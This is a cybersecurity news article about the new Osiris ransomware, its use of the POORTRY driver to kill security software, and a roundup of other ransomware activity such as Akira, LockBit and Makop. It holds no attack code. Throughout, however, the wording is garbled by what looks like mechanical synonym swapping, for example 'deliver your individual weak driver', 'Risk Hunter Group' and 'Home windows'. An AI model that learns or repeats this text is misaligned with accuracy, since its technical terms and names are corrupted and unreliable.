New Osiris Ransomware Emerges as New Pressure Utilizing POORTRY Driver in BYOVD Assault

Cybersecurity researchers have disclosed particulars of a brand new ransomware household referred to as Osiris that focused a serious meals service franchisee operator in Southeast Asia in November 2025.

The assault leveraged a malicious driver referred to as POORTRY as a part of a identified method known as deliver your individual weak driver (BYOVD) to disarm safety software program, the Symantec and Carbon Black Risk Hunter Group stated.

It is price noting that Osiris is assessed to be a brand-new ransomware pressure, sharing no similarities with one other variant of the similar title that emerged in December 2016 as an iteration of the Locky ransomware. It is at present not identified who the builders of the locker are, or if it is marketed as a ransomware-as-a-service (RaaS).

Nonetheless, the Broadcom-owned cybersecurity division stated it recognized clues that recommend the menace actors who deployed the ransomware could have been beforehand related to INC ransomware (aka Warble).

“A variety of dwelling off the land and dual-use instruments have been used on this assault, as was a malicious POORTRY driver, which was seemingly used as a part of a deliver your individual weak driver (BYOVD) assault to disable safety software program,” the corporate stated in a report shared with The Hacker Information.

“The exfiltration of knowledge by the attackers to Wasabi buckets, and the usage of a model of Mimikatz that was beforehand used, with the identical filename (kaz.exe), by attackers deploying the INC ransomware, level to potential hyperlinks between this assault and a few assaults involving INC.”

Described as an “efficient encryption payload” that is seemingly wielded by skilled attackers, Osiris makes use of a hybrid encryption scheme and a novel encryption key for every file. It is also versatile in that it might cease companies, specify which folders and extensions have to be encrypted, terminate processes, and drop a ransom observe.

By default, it is designed to kill an extended listing of processes and companies associated to Microsoft Workplace, Change, Mozilla Firefox, WordPad, Notepad, Quantity Shadow Copy, and Veeam, amongst others.

First indicators of malicious exercise on the goal’s community concerned the exfiltration of delicate information utilizing Rclone to a Wasabi cloud storage bucket previous to the ransomware deployment. Additionally utilized within the assault have been various dual-use instruments like Netscan, Netexec, and MeshAgent, in addition to a customized model of the Rustdesk distant desktop software program.

POORTRY is somewhat totally different from conventional BYOVD assaults in that it makes use of a bespoke driver expressly designed for elevating privileges and terminating safety instruments, versus deploying a legitimate-but-vulnerable driver to the goal community.

The most lively gamers in the course of the previous 12 months have been Akira (aka Darter or Howling Scorpius), Qilin (aka Stinkbug or Water Galura), Play (aka Balloonfly), INC, SafePay, RansomHub (aka Greenbottle), DragonForce (aka Hackledorb), Sinobi, Rhysida, and CACTUS. A number of the different notable developments within the area are listed beneath –

• Risk actors utilizing the Akira ransomware have leveraged a weak Throttlestop driver, together with the Home windows CardSpace Person Interface Agent and Microsoft Media Basis Protected Pipeline, to sideload the Bumblebee loader in assaults noticed in mid-to-late 2025.
• Akira ransomware campaigns have additionally exploited SonicWall SSL VPNs to breach small- to medium-sized enterprise environments throughout mergers and acquisitions and finally acquire entry to the larger, buying enterprises. One other Akira assault has been discovered to leverage ClickFix-style CAPTCHA verification lures to drop a .NET distant entry trojan referred to as SectopRAT, which serves as a conduit for distant management and ransomware supply.
• LockBit (aka Syrphid), which partnered with DragonForce and Qilin in October 2025, has continued to keep its infrastructure regardless of a legislation enforcement operation to close down its operations in early 2024. It has additionally launched variants of LockBit 5.0 concentrating on a number of working programs and virtualization platforms. A major replace to LockBit 5.0 is the introduction of a two-stage ransomware deployment mannequin that separates the loader from the primary payload, whereas concurrently maximizing evasion, modularity, and damaging impression.
• A brand new RaaS operation dubbed Sicarii has claimed just one sufferer because it first surfaced in late 2025. Whereas the group explicitly identifies itself as Israeli/Jewish, evaluation has uncovered that underground on-line exercise is primarily carried out in Russian and that the Hebrew content material shared by the menace actor accommodates grammatical and semantic errors. This has raised the opportunity of a false flag operation. Sicarii’s main Sicarii operator makes use of the Telegram account “@Skibcum.”
• The menace actor referred to as Storm-2603 (aka CL-CRI-1040 or Gold Salem) has been noticed leveraging the authentic Velociraptor digital forensics and incident response (DFIR) instrument as a part of precursor exercise resulting in the deployment of Warlock, LockBit, and Babuk ransomware. The assaults have additionally utilized two drivers (“rsndispot.sys” and “kl.sys”) together with “vmtools.exe” to disable safety options utilizing a BYOVD assault.

• Entities in India, Brazil, and Germany have been focused by Makop ransomware assaults that exploit uncovered and insecure RDP programs to stage instruments for community scanning, privilege escalation, disabling safety software program, credential dumping, and ransomware deployment. The assaults, moreover utilizing “hlpdrv.sys” and “ThrottleStop.sys” drivers for BYOVD assaults, additionally deploy GuLoader to ship the ransomware payload. That is the primary documented case of Makop being distributed through a loader.
• Ransomware assaults have additionally obtained preliminary entry utilizing already-compromised RDP credentials to carry out reconnaissance, privilege escalation, lateral motion through RDP, adopted by exfiltrating information to temp[.]sh on day six of the intrusion and deploying Lynx ransomware three days later.
• A safety flaw within the encryption course of related to the Obscura ransomware has been discovered to render massive recordsdata unrecoverable. “When it encrypts massive recordsdata, it fails to put in writing the encrypted short-term key to the file’s footer,” Coveware stated. “For recordsdata over 1GB, that footer is rarely created in any respect — which suggests the important thing wanted for decryption is misplaced. These recordsdata are completely unrecoverable.”
• A brand new ransomware household named 01flip has focused a restricted set of victims within the Asia-Pacific area. Written in Rust, the ransomware can goal each Home windows and Linux programs. Assault chains contain the exploitation of identified safety vulnerabilities (e.g., CVE-2019-11580) to acquire a foothold into goal networks. It has been attributed to a financially motivated menace actor referred to as CL-CRI-1036.

To guard towards focused assaults, organizations are suggested to watch the usage of dual-use instruments, limit entry to RDP companies, implement multi-factor authentication (2FA), use utility allowlisting the place relevant, and implement off-site storage of backup copies.

“Whereas assaults involving encrypting ransomware stay as prevalent as ever and nonetheless pose a menace, the appearance of latest varieties of encryptionless assaults provides one other diploma of danger, making a wider extortion ecosystem of which ransomware could grow to be only one element,” Symantec and Carbon Black stated.